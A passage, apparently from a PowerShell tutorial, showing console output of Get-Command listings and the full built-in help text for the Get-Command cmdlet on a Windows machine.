[-Name] [-PSProvider] ] [-Cre... Cmdlet New-PSSessionOption New-PSSessionOption [-MaximumRedirection ... Cmdlet New-Service New-Service [-Name] [-BinaryPathName] <... Cmdlet New-TimeSpan New-TimeSpan [[-Start] ] [[-End] [[-Value] ... Cmdlet New-WebServiceProxy New-WebServiceProxy [-Uri] [[-Class] [-Selecto... Cmdlet New-WSManSessionOption New-WSManSessionOption [-ProxyAccessType ] [-Verbose]... Cmdlet Out-File Out-File [-FilePath] [[-Encoding] ] [-Title <... Cmdlet Out-Host Out-Host [-Paging] [-InputObject ] [-V... Cmdlet Out-Null Out-Null [-InputObject ] [-Verbose] [-... Cmdlet Out-Printer Out-Printer [[-Name] ] [-InputObject ] [-InputObj... Function P: Set-Location P: Alias popd Pop-Location Cmdlet Pop-Location Pop-Location [-PassThru] [-StackName ] [... Function prompt $(if (test-path variable:/PSDebugContext) { '[DB... Alias ps Get-Process Alias pushd Push-Location Cmdlet Push-Location Push-Location [[-Path] ] [-PassThru] [-S... Alias pwd Get-Location Function Q: Set-Location Q: Alias r Invoke-History Function R: Set-Location R: Alias rbp Remove-PSBreakpoint Alias rcjb Receive-Job Alias rd Remove-Item Alias rdr Remove-PSDrive Cmdlet Read-Host Read-Host [[-Prompt] ] [-AsSecureString]... Cmdlet Receive-Job Receive-Job [-Job] [[-Location] [... Cmdlet Register-PSSessionConfiguration Register-PSSessionConfiguration [-Name] ... Cmdlet Register-WmiEvent Register-WmiEvent [-Class] [[-SourceIde... Cmdlet Remove-Computer Remove-Computer [[-Credential] ] [... Cmdlet Remove-Event Remove-Event [-SourceIdentifier] [-Verb... Cmdlet Remove-EventLog Remove-EventLog [-LogName] [[-Compute... Cmdlet Remove-Item Remove-Item [-Path] [-Filter ... Cmdlet Remove-ItemProperty Remove-ItemProperty [-Path] [-Name] <... Cmdlet Remove-Job Remove-Job [-Id] [-Force] [-Verbose] [... Cmdlet Remove-Module Remove-Module [-Name] [-Force] [-Verb... Cmdlet Remove-PSBreakpoint Remove-PSBreakpoint [-Breakpoint] ... Cmdlet Remove-PSDrive Remove-PSDrive [-Name] [-PSProvider <... Cmdlet Remove-PSSession Remove-PSSession [-Id] [-Verbose] [-De... Cmdlet Remove-PSSnapin Remove-PSSnapin [-Name] [-PassThru] [... Cmdlet Remove-Variable Remove-Variable [-Name] [-Include [-AsJob] [-Im... Cmdlet Remove-WSManInstance Remove-WSManInstance [-ResourceURI] [-Sele... Alias ren Rename-Item Cmdlet Rename-Item Rename-Item [-Path] [-NewName] ... Cmdlet Rename-ItemProperty Rename-ItemProperty [-Path] [-Name] ]... Cmdlet Resolve-Path Resolve-Path [-Path] [-Relative] [-Cr... Cmdlet Restart-Computer Restart-Computer [[-ComputerName] ] [[... Cmdlet Restart-Service Restart-Service [-Name] [-Force] [-Pa... Cmdlet Restore-Computer Restore-Computer [-RestorePoint] [-Verbo... Cmdlet Resume-Service Resume-Service [-Name] [-PassThru] [-... Alias ri Remove-Item Alias rjb Remove-Job Alias rm Remove-Item Alias rmdir Remove-Item Alias rmo Remove-Module Alias rni Rename-Item Alias rnp Rename-ItemProperty Alias rp Remove-ItemProperty Alias rsn Remove-PSSession Alias rsnp Remove-PSSnapin Alias rv Remove-Variable Alias rvpa Resolve-Path Alias rwmi Remove-WMIObject Function S: Set-Location S: Alias sajb Start-Job Alias sal Set-Alias Alias saps Start-Process Alias sasv Start-Service Alias sbp Set-PSBreakpoint Alias sc Set-Content Alias select Select-Object Cmdlet Select-Object Select-Object [[-Property] ] [-InputOb... Cmdlet Select-String Select-String [-Pattern] -InputObject... Cmdlet Select-Xml Select-Xml [-XPath] [-Xml] ... Cmdlet Send-MailMessage Send-MailMessage [-To] [-Subject] [-AclObject] [-Value] [-D... Cmdlet Set-AuthenticodeSignature Set-AuthenticodeSignature [-FilePath] ... Cmdlet Set-Content Set-Content [-Path] [-Value] [-DisplayHint [[-Value] ] ... Cmdlet Set-ItemProperty Set-ItemProperty [-Path] [-Name] ] [-PassThru] [-Ve... Cmdlet Set-PSBreakpoint Set-PSBreakpoint [-Script] [-Line] ] [-Step] [-Strict] [... Cmdlet Set-PSSessionConfiguration Set-PSSessionConfiguration [-Name] [-Ap... Cmdlet Set-Service Set-Service [-Name] [-ComputerName [-Verbose] [-D... Cmdlet Set-TraceSource Set-TraceSource [-Name] [[-Option] [[-Value] [[-Arguments] ... Cmdlet Set-WSManInstance Set-WSManInstance [-ResourceURI] [[-Select... Cmdlet Set-WSManQuickConfig Set-WSManQuickConfig [-UseSSL] [-Force] [-Verbos... Cmdlet Show-EventLog Show-EventLog [[-ComputerName] ] [-Verbo... Alias si Set-Item Alias sl Set-Location Alias sleep Start-Sleep Alias sort Sort-Object Cmdlet Sort-Object Sort-Object [[-Property] ] [-Descendin... Alias sp Set-ItemProperty Alias spjb Stop-Job Cmdlet Split-Path Split-Path [-Path] [-LiteralPath [[-Initia... Cmdlet Start-Process Start-Process [-FilePath] [[-ArgumentLi... Cmdlet Start-Service Start-Service [-Name] [-PassThru] [-I... Cmdlet Start-Sleep Start-Sleep [-Seconds] [-Verbose] [-Debu... Cmdlet Start-Transaction Start-Transaction [-Timeout ] [-Independe... Cmdlet Start-Transcript Start-Transcript [[-Path] ] [-Append] [-... Cmdlet Stop-Computer Stop-Computer [[-ComputerName] ] [[-Cr... Cmdlet Stop-Job Stop-Job [-Id] [-PassThru] [-Verbose] ... Cmdlet Stop-Process Stop-Process [-Id] [-PassThru] [-Force... Cmdlet Stop-Service Stop-Service [-Name] [-Force] [-PassT... Cmdlet Stop-Transcript Stop-Transcript [-Verbose] [-Debug] [-ErrorActio... Cmdlet Suspend-Service Suspend-Service [-Name] [-PassThru] [... Alias sv Set-Variable Alias swmi Set-WMIInstance Function T: Set-Location T: Function TabExpansion ... Alias tee Tee-Object Cmdlet Tee-Object Tee-Object [-FilePath] [-InputObject [[-So... Cmdlet Test-ModuleManifest Test-ModuleManifest [-Path] [-Verbose] ... Cmdlet Test-Path Test-Path [-Path] [-Filter ] ... Cmdlet Test-WSMan Test-WSMan [[-ComputerName] ] [-Authenti... Cmdlet Trace-Command Trace-Command [-Name] [-Expression] <... Alias type Get-Content Function U: Set-Location U: Cmdlet Undo-Transaction Undo-Transaction [-Verbose] [-Debug] [-ErrorActi... Cmdlet Unregister-Event Unregister-Event [-SourceIdentifier] [-... Cmdlet Unregister-PSSessionConfiguration Unregister-PSSessionConfiguration [-Name] ] [-P... Cmdlet Update-List Update-List [[-Property] ] [-Add ] [-Pre... Cmdlet Use-Transaction Use-Transaction [-TransactedScript] ] [-Time... Cmdlet Wait-Job Wait-Job [-Id] [-Any] [-Timeout [[-Timeout] [-Inp... Alias wjb Wait-Job Alias write Write-Output Cmdlet Write-Debug Write-Debug [-Message] [-Verbose] [-Deb... Cmdlet Write-Error Write-Error [-Message] [-Category [-Source] ] [-NoNewline] [-S... Cmdlet Write-Output Write-Output [-InputObject] [-Verbo... Cmdlet Write-Progress Write-Progress [-Activity] [-Status] [-Verbose] [-D... Cmdlet Write-Warning Write-Warning [-Message] [-Verbose] [-D... Function X: Set-Location X: Function Y: Set-Location Y: Function Z: Set-Location Z: PS C:\Users\Windows-32> ``` - Make ```Get-Command``` to only lists ```Cmdlet``` ```Powershell PS C:\Users\Windows-32> Get-Command -CommandType cmdlet CommandType Name Definition ----------- ---- ---------- Cmdlet Add-Computer Add-Computer [-DomainName] [-Credential... Cmdlet Add-Content Add-Content [-Path] [-Value] ] [-Pass... Cmdlet Add-Member Add-Member [-MemberType] [-Name]... Cmdlet Add-PSSnapin Add-PSSnapin [-Name] [-PassThru] [-Ve... Cmdlet Add-Type Add-Type [-TypeDefinition] [-Language <... Cmdlet Checkpoint-Computer Checkpoint-Computer [-Description] [[-R... Cmdlet Clear-Content Clear-Content [-Path] [-Filter [[-Computer... Cmdlet Clear-History Clear-History [[-Id] ] [[-Count] [-Force] [-Filter ... Cmdlet Clear-ItemProperty Clear-ItemProperty [-Path] [-Name] [-Include [... Cmdlet Complete-Transaction Complete-Transaction [-Verbose] [-Debug] [-Error... Cmdlet Connect-WSMan Connect-WSMan [[-ComputerName] ] [-Appli... Cmdlet ConvertFrom-Csv ConvertFrom-Csv [-InputObject] [[-D... Cmdlet ConvertFrom-SecureString ConvertFrom-SecureString [-SecureString] [-... Cmdlet Convert-Path Convert-Path [-Path] [-Verbose] [-Deb... Cmdlet ConvertTo-Csv ConvertTo-Csv [-InputObject] [[-Delim... Cmdlet ConvertTo-Html ConvertTo-Html [[-Property] ] [[-Head]... Cmdlet ConvertTo-SecureString ConvertTo-SecureString [-String] [[-Sec... Cmdlet ConvertTo-Xml ConvertTo-Xml [-InputObject] [-Depth ... Cmdlet Copy-Item Copy-Item [-Path] [[-Destination] [-Destinati... Cmdlet Debug-Process Debug-Process [-Name] [-Verbose] [-De... Cmdlet Disable-ComputerRestore Disable-ComputerRestore [-Drive] [-Ve... Cmdlet Disable-PSBreakpoint Disable-PSBreakpoint [-Breakpoint] [-Verbose]... Cmdlet Disconnect-WSMan Disconnect-WSMan [[-ComputerName] ] [-Ve... Cmdlet Enable-ComputerRestore Enable-ComputerRestore [-Drive] [-Ver... Cmdlet Enable-PSBreakpoint Enable-PSBreakpoint [-Id] [-PassThru] ... Cmdlet Enable-PSRemoting Enable-PSRemoting [-Force] [-Verbose] [-Debug] [... Cmdlet Enable-PSSessionConfiguration Enable-PSSessionConfiguration [[-Name] [[-Delegate... Cmdlet Enter-PSSession Enter-PSSession [-ComputerName] [-Crede... Cmdlet Exit-PSSession Exit-PSSession [-Verbose] [-Debug] [-ErrorAction... Cmdlet Export-Alias Export-Alias [-Path] [[-Name] [-Depth ] ... Cmdlet Export-Console Export-Console [[-Path] ] [-Force] [-NoC... Cmdlet Export-Counter Export-Counter [-Path] [-FileFormat [[-Delimiter] ... Cmdlet Export-FormatData Export-FormatData [-InputObject ] [-C... Cmdlet Export-PSSession Export-PSSession [-Session] [-Output... Cmdlet ForEach-Object ForEach-Object [-Process] [-Inpu... Cmdlet Format-Custom Format-Custom [[-Property] ] [-Depth <... Cmdlet Format-List Format-List [[-Property] ] [-GroupBy <... Cmdlet Format-Table Format-Table [[-Property] ] [-AutoSize... Cmdlet Format-Wide Format-Wide [[-Property] ] [-AutoSize] [... Cmdlet Get-Acl Get-Acl [[-Path] ] [-Audit] [-Filter <... Cmdlet Get-Alias Get-Alias [[-Name] ] [-Exclude ... Cmdlet Get-ChildItem Get-ChildItem [[-Path] ] [[-Filter] ] [-Verb ... Cmdlet Get-ComputerRestorePoint Get-ComputerRestorePoint [[-RestorePoint] [-ReadCount ] [-SampleInte... Cmdlet Get-Credential Get-Credential [-Credential] [-Ve... Cmdlet Get-Culture Get-Culture [-Verbose] [-Debug] [-ErrorAction ] [-Year ] [-... Cmdlet Get-Event Get-Event [[-SourceIdentifier] ] [-Verbo... Cmdlet Get-EventLog Get-EventLog [-LogName] [[-InstanceId] ... Cmdlet Get-EventSubscriber Get-EventSubscriber [[-SourceIdentifier] ] [-Verbos... Cmdlet Get-Help Get-Help [[-Name] ] [-Path ] [-C... Cmdlet Get-History Get-History [[-Id] ] [[-Count] ]... Cmdlet Get-Host Get-Host [-Verbose] [-Debug] [-ErrorAction ] [-ComputerName [-Filter ] [... Cmdlet Get-ItemProperty Get-ItemProperty [-Path] [[-Name] ] [-Verbose] [-Debug] [-... Cmdlet Get-Location Get-Location [-PSProvider ] [-PSDrive ... Cmdlet Get-Member Get-Member [[-Name] ] [-InputObject ] [-All] [-Verbose... Cmdlet Get-PfxCertificate Get-PfxCertificate [-FilePath] [-Verb... Cmdlet Get-Process Get-Process [[-Name] ] [-ComputerName ... Cmdlet Get-PSBreakpoint Get-PSBreakpoint [[-Script] ] [-Verbos... Cmdlet Get-PSCallStack Get-PSCallStack [-Verbose] [-Debug] [-ErrorActio... Cmdlet Get-PSDrive Get-PSDrive [[-Name] ] [-Scope ] [-Verb... Cmdlet Get-PSSession Get-PSSession [[-ComputerName] ] [-Ver... Cmdlet Get-PSSessionConfiguration Get-PSSessionConfiguration [[-Name] ] ... Cmdlet Get-PSSnapin Get-PSSnapin [[-Name] ] [-Registered] ... Cmdlet Get-Random Get-Random [[-Maximum] ] [-SetSeed ] [-ComputerName ... Cmdlet Get-TraceSource Get-TraceSource [[-Name] ] [-Verbose] ... Cmdlet Get-Transaction Get-Transaction [-Verbose] [-Debug] [-ErrorActio... Cmdlet Get-UICulture Get-UICulture [-Verbose] [-Debug] [-ErrorAction ... Cmdlet Get-Unique Get-Unique [-InputObject ] [-AsString]... Cmdlet Get-Variable Get-Variable [[-Name] ] [-ValueOnly] [... Cmdlet Get-WinEvent Get-WinEvent [[-LogName] ] [-MaxEvents... Cmdlet Get-WmiObject Get-WmiObject [-Class] [[-Property] [-Applica... Cmdlet Group-Object Group-Object [[-Property] ] [-NoElemen... Cmdlet Import-Alias Import-Alias [-Path] [-Scope ] ... Cmdlet Import-Clixml Import-Clixml [-Path] [-Verbose] [-De... Cmdlet Import-Counter Import-Counter [-Path] [-StartTime [[-Delimiter] ... Cmdlet Import-Module Import-Module [-Name] [-Global] [-Pre... Cmdlet Import-PSSession Import-PSSession [-Session] [[-Comma... Cmdlet Invoke-Command Invoke-Command [-ScriptBlock] [-In... Cmdlet Invoke-Expression Invoke-Expression [-Command] [-Verbose]... Cmdlet Invoke-History Invoke-History [[-Id] ] [-Verbose] [-Deb... Cmdlet Invoke-Item Invoke-Item [-Path] [-Filter ... Cmdlet Invoke-WmiMethod Invoke-WmiMethod [-Class] [-Name] [-Action... Cmdlet Join-Path Join-Path [-Path] [-ChildPath] [-ComputerN... Cmdlet Measure-Command Measure-Command [-Expression] [-In... Cmdlet Measure-Object Measure-Object [[-Property] ] [-InputO... Cmdlet Move-Item Move-Item [-Path] [[-Destination] [-Destinati... Cmdlet New-Alias New-Alias [-Name] [-Value] [-D... Cmdlet New-Event New-Event [-SourceIdentifier] [[-Sender... Cmdlet New-EventLog New-EventLog [-LogName] [-Source] [-ItemType ]... Cmdlet New-ItemProperty New-ItemProperty [-Path] [-Name] [-Functi... Cmdlet New-ModuleManifest New-ModuleManifest [-Path] -NestedModul... Cmdlet New-Object New-Object [-TypeName] [[-ArgumentList]... Cmdlet New-PSDrive New-PSDrive [-Name] [-PSProvider] ] [-Cre... Cmdlet New-PSSessionOption New-PSSessionOption [-MaximumRedirection ... Cmdlet New-Service New-Service [-Name] [-BinaryPathName] <... Cmdlet New-TimeSpan New-TimeSpan [[-Start] ] [[-End] [[-Value] ... Cmdlet New-WebServiceProxy New-WebServiceProxy [-Uri] [[-Class] [-Selecto... Cmdlet New-WSManSessionOption New-WSManSessionOption [-ProxyAccessType ] [-Verbose]... Cmdlet Out-File Out-File [-FilePath] [[-Encoding] ] [-Title <... Cmdlet Out-Host Out-Host [-Paging] [-InputObject ] [-V... Cmdlet Out-Null Out-Null [-InputObject ] [-Verbose] [-... Cmdlet Out-Printer Out-Printer [[-Name] ] [-InputObject ] [-InputObj... Cmdlet Pop-Location Pop-Location [-PassThru] [-StackName ] [... Cmdlet Push-Location Push-Location [[-Path] ] [-PassThru] [-S... Cmdlet Read-Host Read-Host [[-Prompt] ] [-AsSecureString]... Cmdlet Receive-Job Receive-Job [-Job] [[-Location] [... Cmdlet Register-PSSessionConfiguration Register-PSSessionConfiguration [-Name] ... Cmdlet Register-WmiEvent Register-WmiEvent [-Class] [[-SourceIde... Cmdlet Remove-Computer Remove-Computer [[-Credential] ] [... Cmdlet Remove-Event Remove-Event [-SourceIdentifier] [-Verb... Cmdlet Remove-EventLog Remove-EventLog [-LogName] [[-Compute... Cmdlet Remove-Item Remove-Item [-Path] [-Filter ... Cmdlet Remove-ItemProperty Remove-ItemProperty [-Path] [-Name] <... Cmdlet Remove-Job Remove-Job [-Id] [-Force] [-Verbose] [... Cmdlet Remove-Module Remove-Module [-Name] [-Force] [-Verb... Cmdlet Remove-PSBreakpoint Remove-PSBreakpoint [-Breakpoint] ... Cmdlet Remove-PSDrive Remove-PSDrive [-Name] [-PSProvider <... Cmdlet Remove-PSSession Remove-PSSession [-Id] [-Verbose] [-De... Cmdlet Remove-PSSnapin Remove-PSSnapin [-Name] [-PassThru] [... Cmdlet Remove-Variable Remove-Variable [-Name] [-Include [-AsJob] [-Im... Cmdlet Remove-WSManInstance Remove-WSManInstance [-ResourceURI] [-Sele... Cmdlet Rename-Item Rename-Item [-Path] [-NewName] ... Cmdlet Rename-ItemProperty Rename-ItemProperty [-Path] [-Name] ]... Cmdlet Resolve-Path Resolve-Path [-Path] [-Relative] [-Cr... Cmdlet Restart-Computer Restart-Computer [[-ComputerName] ] [[... Cmdlet Restart-Service Restart-Service [-Name] [-Force] [-Pa... Cmdlet Restore-Computer Restore-Computer [-RestorePoint] [-Verbo... Cmdlet Resume-Service Resume-Service [-Name] [-PassThru] [-... Cmdlet Select-Object Select-Object [[-Property] ] [-InputOb... Cmdlet Select-String Select-String [-Pattern] -InputObject... Cmdlet Select-Xml Select-Xml [-XPath] [-Xml] ... Cmdlet Send-MailMessage Send-MailMessage [-To] [-Subject] [-AclObject] [-Value] [-D... Cmdlet Set-AuthenticodeSignature Set-AuthenticodeSignature [-FilePath] ... Cmdlet Set-Content Set-Content [-Path] [-Value] [-DisplayHint [[-Value] ] ... Cmdlet Set-ItemProperty Set-ItemProperty [-Path] [-Name] ] [-PassThru] [-Ve... Cmdlet Set-PSBreakpoint Set-PSBreakpoint [-Script] [-Line] ] [-Step] [-Strict] [... Cmdlet Set-PSSessionConfiguration Set-PSSessionConfiguration [-Name] [-Ap... Cmdlet Set-Service Set-Service [-Name] [-ComputerName [-Verbose] [-D... Cmdlet Set-TraceSource Set-TraceSource [-Name] [[-Option] [[-Value] [[-Arguments] ... Cmdlet Set-WSManInstance Set-WSManInstance [-ResourceURI] [[-Select... Cmdlet Set-WSManQuickConfig Set-WSManQuickConfig [-UseSSL] [-Force] [-Verbos... Cmdlet Show-EventLog Show-EventLog [[-ComputerName] ] [-Verbo... Cmdlet Sort-Object Sort-Object [[-Property] ] [-Descendin... Cmdlet Split-Path Split-Path [-Path] [-LiteralPath [[-Initia... Cmdlet Start-Process Start-Process [-FilePath] [[-ArgumentLi... Cmdlet Start-Service Start-Service [-Name] [-PassThru] [-I... Cmdlet Start-Sleep Start-Sleep [-Seconds] [-Verbose] [-Debu... Cmdlet Start-Transaction Start-Transaction [-Timeout ] [-Independe... Cmdlet Start-Transcript Start-Transcript [[-Path] ] [-Append] [-... Cmdlet Stop-Computer Stop-Computer [[-ComputerName] ] [[-Cr... Cmdlet Stop-Job Stop-Job [-Id] [-PassThru] [-Verbose] ... Cmdlet Stop-Process Stop-Process [-Id] [-PassThru] [-Force... Cmdlet Stop-Service Stop-Service [-Name] [-Force] [-PassT... Cmdlet Stop-Transcript Stop-Transcript [-Verbose] [-Debug] [-ErrorActio... Cmdlet Suspend-Service Suspend-Service [-Name] [-PassThru] [... Cmdlet Tee-Object Tee-Object [-FilePath] [-InputObject [[-So... Cmdlet Test-ModuleManifest Test-ModuleManifest [-Path] [-Verbose] ... Cmdlet Test-Path Test-Path [-Path] [-Filter ] ... Cmdlet Test-WSMan Test-WSMan [[-ComputerName] ] [-Authenti... Cmdlet Trace-Command Trace-Command [-Name] [-Expression] <... Cmdlet Undo-Transaction Undo-Transaction [-Verbose] [-Debug] [-ErrorActi... Cmdlet Unregister-Event Unregister-Event [-SourceIdentifier] [-... Cmdlet Unregister-PSSessionConfiguration Unregister-PSSessionConfiguration [-Name] ] [-P... Cmdlet Update-List Update-List [[-Property] ] [-Add ] [-Pre... Cmdlet Use-Transaction Use-Transaction [-TransactedScript] ] [-Time... Cmdlet Wait-Job Wait-Job [-Id] [-Any] [-Timeout [[-Timeout] [-Inp... Cmdlet Write-Debug Write-Debug [-Message] [-Verbose] [-Deb... Cmdlet Write-Error Write-Error [-Message] [-Category [-Source] ] [-NoNewline] [-S... Cmdlet Write-Output Write-Output [-InputObject] [-Verbo... Cmdlet Write-Progress Write-Progress [-Activity] [-Status] [-Verbose] [-D... Cmdlet Write-Warning Write-Warning [-Message] [-Verbose] [-D... PS C:\Users\Windows-32> ``` - ```Print full help``` ```Powershell PS C:\Users\Windows-32> Get-Help Get-Command -full NAME Get-Command SYNOPSIS Gets basic information about cmdlets and other elements of Windows PowerShell commands. SYNTAX Get-Command [[-Name] ] [-CommandType {Alias | Function | Filter | Cmdlet | ExternalScript | Application | Script | All}] [[-ArgumentList] ] [-Module ] [-Syntax] [-TotalCount ] [ ] Get-Command [-Noun ] [-Verb ] [[-ArgumentList] ] [-Module ] [-Syntax] [-Tot alCount ] [] DESCRIPTION The Get-Command cmdlet gets basic information about cmdlets and other elements of Windows PowerShell commands in th e session, such as aliases, functions, filters, scripts, and applications. Get-Command gets its data directly from the code of a cmdlet, function, script, or alias, unlike Get-Help, which ge ts its information from help topic files. Without parameters, "Get-Command" gets all of the cmdlets and functions in the current session. "Get-Command *" get s all Windows PowerShell elements and all of the non-Windows-PowerShell files in the Path environment variable ($en v:path). It groups the files in the "Application" command type. You can use the Module parameter of Get-Command to find the commands that were added to the session by adding a Win dows PowerShell snap-in or importing a module. PARAMETERS -ArgumentList Gets information about a cmdlet or function when it is used with the specified parameters ("arguments"), such as a path. The alias for ArgumentList is Args. To detect parameters that are added to a cmdlet when it is used with a particular provider, set the value of Ar gumentList to a path in the provider drive, such as "HKML\Software" or "cert:\my". Required? false Position? 2 Default value Accept pipeline input? false Accept wildcard characters? false -CommandType Gets only the specified types of commands. Use "CommandType" or its alias, "Type". By default, Get-Command gets cmdlets and functions. Valid values are: -- Alias: All Windows PowerShell aliases in the current session. -- All: All command types. It is the equivalent of "get-command *". -- Application: All non-Windows-PowerShell files in paths listed in the Path environment variable ($env:path), including .txt, .exe, and .dll files. -- Cmdlet: The cmdlets in the current session. "Cmdlet" is the default. -- ExternalScript: All .ps1 files in the paths listed in the Path environment variable ($env:path). -- Filter and Function: All Windows PowerShell functions. -- Script: Script blocks in the current session. Required? false Position? named Default value Accept pipeline input? true (ByPropertyName) Accept wildcard characters? false -Module Gets the commands that came from the specified modules or snap-ins. Enter the names of modules or snap-ins, or enter snap-in or module objects. You can refer to this parameter by its name, Module, or by its alias, PSSnapin. The parameter name that you cho ose has no effect on the command or its output. This parameter takes string values, but you can also supply a PSModuleInfo or PSSnapinInfo object, such as the objects that Get-Module, Get-PSSnapin, and Import-PSSession return. Required? false Position? named Default value None Accept pipeline input? true (ByPropertyName) Accept wildcard characters? false -Name Gets information only about the cmdlets or command elements with the specified name. represents all or part of the name of the cmdlet or command element. Wildcards are permitted. To list commands with the same name in execution order, type the command name without wildcard characters. For more information, see the Notes section. Required? false Position? 1 Default value Accept pipeline input? true (ByValue, ByPropertyName) Accept wildcard characters? false -Noun Gets cmdlets and functions with names that include the specified noun. represents one or more nouns or noun patterns, such as "process" or "*item*". Wildcards are permitted. Required? false Position? named Default value Accept pipeline input? true (ByPropertyName) Accept wildcard characters? false -Syntax [] Gets only specified data about the command element. * For aliases, retrieves the standard name. * For cmdlets, retrieves the syntax. * For functions and filters, retrieves the function definition. * For scripts and applications (files), retrieves the path and filename. Required? false Position? named Default value Accept pipeline input? true (ByPropertyName) Accept wildcard characters? false -TotalCount Gets only the specified number of command elements. You can use this parameter to limit the output of a command . Required? false Position? named Default value Accept pipeline input? true (ByPropertyName) Accept wildcard characters? false -Verb Gets information about cmdlets and functions with names that include the specified verb. represents on e or more verbs or verb patterns, such as "remove" or *et". Wildcards are permitted. Required? false Position? named Default value Accept pipeline input? true (ByPropertyName) Accept wildcard characters? false This cmdlet supports the common parameters: Verbose, Debug, ErrorAction, ErrorVariable, WarningAction, WarningVariable, OutBuffer and OutVariable. For more information, type, "get-help about_commonparameters". INPUTS System.String You can pipe a "Name", "Command", and "Verb" noun-property specified, or a string object to Get-Command. OUTPUTS Object The type of object returned depends on the type of command element retrieved. For example, Get-Command on a cmd let retrieves a CmdletInfo object, while Get-Command on a DLL retrieves an ApplicationInfo object. NOTES Without parameters, "Get-Command" gets information about the Windows PowerShell cmdlets and functions. Use the parameters to qualify the elements retrieved. Unlike Get-Help, which displays the contents of XML-based help topic files, Get-Command gets its cmdlet informa tion directly from the cmdlet code in the system. Get-Command returns the commands in alphabetical order. When the session contains more than one command with th e same name, Get-Command returns the commands in execution order. The first command that is listed is the comm and that runs when you type the command name without qualification. For more information, see about_Command_Pre cedence. -------------------------- EXAMPLE 1 -------------------------- C:\PS>get-command Description ----------- This command gets information about all of the Windows PowerShell cmdlets and functions. The default display lists the command type ("Cmdlet" or "Function" or "Filter"), the name of the cmdlet or function , and the syntax or function definition. -------------------------- EXAMPLE 2 -------------------------- C:\PS>get-command -verb set | format-list Description ----------- This command gets information about all of the cmdlets and functions with the verb "set", and it displays some of t hat information in a list. The list format includes fields that are omitted from the table display, including the complete syntax. To display all fields (all properties of the object), type "get-command -verb set | format-list *". -------------------------- EXAMPLE 3 -------------------------- C:\PS>get-command -type cmdlet | sort-object noun | format-table -group noun Description ----------- This command retrieves all of the cmdlets, sorts them alphabetically by the noun in the cmdlet name, and then displ ays them in noun-based groups. This display can help you find the cmdlets for a task. By default, Get-Command displays items in the order in which the system discovers them, which is also the order in which they are selected to run when a run command is ambiguous. -------------------------- EXAMPLE 4 -------------------------- C:\PS>get-command -module Microsoft.PowerShell.Security, TestModule Description ----------- This command gets the commands in the Microsoft.PowerShell.Security snap-in and the Test-Module module. The Module parameter gets commands that were added by importing modules or adding Windows PowerShell snap-ins. -------------------------- EXAMPLE 5 -------------------------- C:\PS>get-command get-childitem -args cert: -syntax Description ----------- This command retrieves information about the Get-ChildItem cmdlet when Get-ChildItem is used with the Windows Power Shell Certificate provider. When you compare the syntax displayed in the output with the syntax that is displayed when you omit the Args (Argum entList) parameter, you'll see that the Certificate provider dynamically adds a parameter, CodeSigningCert, to the Get-ChildItem cmdlet. -------------------------- EXAMPLE 6 -------------------------- C:\PS>(get-command get-childitem -ArgumentList cert:).parametersets[0].parameters | where-object { $_.IsDynamic } Description ----------- This command retrieves only parameters that are added to the Get-ChildItem cmdlet dynamically when it is used with the Windows PowerShell Certificate provider. This is an alternative to the method used in the previous example. In this command, the "get-command get-childitem -ArgumentList cert:" is processed first. It requests information fr om Get-Command about the Get-ChildItem cmdlet when it is used with the Certificate provider. The ".parametersets[0] " selects the first parameter set (set 0) of "get-childitem -argumentList cert:" and ".parameters" selects the para meters in that parameter set. The resulting parameters are piped to the Where-Object cmdlet to test each parameter ("$_.") by using the IsDynamic property. To find the properties of the objects in a command, use Get-Member. -------------------------- EXAMPLE 7 -------------------------- C:\PS>get-command * Description ----------- This command gets information about the Windows PowerShell cmdlets, functions, filters, scripts, and aliases in the current console. It also gets information about all of the files in the paths of the Path environment variable ($env:path). It retur ns an ApplicationInfo object (System.Management.Automation.ApplicationInfo) for each file, not a FileInfo object (S ystem.IO.FileInfo). -------------------------- EXAMPLE 8 -------------------------- C:\PS>get-command | where-object {$_.definition -like "*first*"} CommandType Name Definition ----------- ---- --------- Cmdlet Select-Object Select-Object [[-Property] Description ----------- This command finds a cmdlet or function based on the name of one of its parameters. You can use this command to ide ntify a cmdlet or function when all that you can recall is the name of one of its parameters. In this case, you recall that one of the cmdlets or functions has a First parameter that gets the first "n" objects in a list, but you cannot remember which cmdlet it is. This command uses the Get-Command cmdlet to get a CmdletInfo object representing each of the cmdlets and functions in the session. The CmdletInfo object has a Definition property that contains the syntax of the cmdlet or function, which includes its parameters. The command uses a pipeline operator (|) to pass the CmdletInfo object to the Where-Object cmdlet, which examines t he definition (syntax) of each object ($_) for a value that includes "first". The result shows that the First parameter belongs to the Select-Object cmdlet. -------------------------- EXAMPLE 9 -------------------------- C:\PS>get-command dir | format-list Name : dir CommandType : Alias Definition : Get-ChildItem ReferencedCommand : Get-ChildItem ResolvedCommand : Get-ChildItem Description ----------- This example shows how to use the Get-Command cmdlet with an alias. Although it is typically used on cmdlets, Get-C ommand also displays information about the code in scripts, functions, aliases, and executable files. This command displays the "dir" alias in the current console. The command pipes the result to the Format-List cmdle ts. -------------------------- EXAMPLE 10 -------------------------- C:\PS>get-command notepad CommandType Name Definition ----------- ---- ---------- Application notepad.exe C:\WINDOWS\system32\notepad.exe Application NOTEPAD.EXE C:\WINDOWS\NOTEPAD.EXE Description ----------- This example shows how to use Get-Command to determine which command Windows PowerShell runs when it has access to multiple commands with the same name. When you use the Name parameter without wildcard characters, Get-Command list s the commands with that name in execution precedence order. This command shows which Notepad program Windows PowerShell runs when you type "Notepad" without a fully qualified path. The command uses the Name parameter without wildcard characters. The sample output shows the Notepad commands in the current console. It indicates that Windows PowerShell will run the instance of Notepad.exe in the C:\Windows\System32 directory. -------------------------- EXAMPLE 11 -------------------------- C:\PS>(get-command get-date).pssnapin C:\PS> (get-command remove-gpo).module Description ----------- These commands show how to find the snap-in or module from which a particular cmdlet originated. The first command uses the PSSnapin property of the CmdletInfo object to find the snap-in that added the Get-Date c mdlet. The second command uses the Module property of the CmdletInfo object to find the module that added the Remove-GPO c mdlet. RELATED LINKS Online version: http://go.microsoft.com/fwlink/?LinkID=113309 about_Command_Precedence Get-Help Get-PSDrive Get-Member Import-PSSession Export-PSSession PS C:\Users\Windows-32> ``` - List all parameters of ```Get-Command``` ```Powershell PS C:\Users\Windows-32> Get-Help Get-Command -Parameter * -ArgumentList Gets information about a cmdlet or function when it is used with the specified parameters ("arguments"), such as a path. The alias for ArgumentList is Args. To detect parameters that are added to a cmdlet when it is used with a particular provider, set the value of Argume ntList to a path in the provider drive, such as "HKML\Software" or "cert:\my". Required? false Position? 2 Default value Accept pipeline input? false Accept wildcard characters? false -CommandType Gets only the specified types of commands. Use "CommandType" or its alias, 